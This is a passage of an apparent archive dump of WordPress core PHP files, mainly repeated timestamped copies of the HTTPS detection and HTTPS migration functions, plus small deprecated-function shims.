if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605120245-20260621081201-20260621151842.php 0000666 00000013341 15224151220 0014714 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605131603-20260621081205-20260621210611.php 0000666 00000011205 15224151220 0014716 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605181535-20260621081100.php 0000666 00000013341 15224151220 0013336 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
readonly.php 0000666 00000002345 15224151220 0007074 0 ustar 00 <?php
/**
* Conditionally declares a `readonly()` function, which was renamed
* to `wp_readonly()` in WordPress 5.9.0.
*
* In order to avoid PHP parser errors, this function was extracted
* to this separate file and is only included conditionally on PHP < 8.1.
*
* Including this file on PHP >= 8.1 results in a fatal error.
*
* @package WordPress
* @since 5.9.0
*/
/**
* Outputs the HTML readonly attribute.
*
* Compares the first two arguments and if identical marks as readonly.
*
* This function is deprecated, and cannot be used on PHP >= 8.1.
*
* @since 4.9.0
* @deprecated 5.9.0 Use wp_readonly() introduced in 5.9.0.
*
* @see wp_readonly()
*
* @param mixed $readonly_value One of the values to compare.
* @param mixed $current Optional. The other value to compare if not just true.
* Default true.
* @param bool $display Optional. Whether to echo or just return the string.
* Default true.
* @return string HTML attribute or empty string.
*/
function readonly( $readonly_value, $current = true, $display = true ) {
_deprecated_function( __FUNCTION__, '5.9.0', 'wp_readonly()' );
return wp_readonly( $readonly_value, $current, $display );
}
https-migration-20260607110256-20260621081100.php 0000666 00000011205 15224151220 0013340 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605082106.php 0000666 00000011205 15224151220 0011766 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class.wp-styles.php 0000666 00000000522 15224151220 0010325 0 ustar 00 <?php
/**
* Dependencies API: WP_Styles class
*
* This file is deprecated, use 'wp-includes/class-wp-styles.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-styles.php' );
/** WP_Styles class */
require_once ABSPATH . WPINC . '/class-wp-styles.php';
https-detection-20260606100517-20260621081102.php 0000666 00000013341 15224151220 0013330 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260606165331.php 0000666 00000013341 15224151220 0011761 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
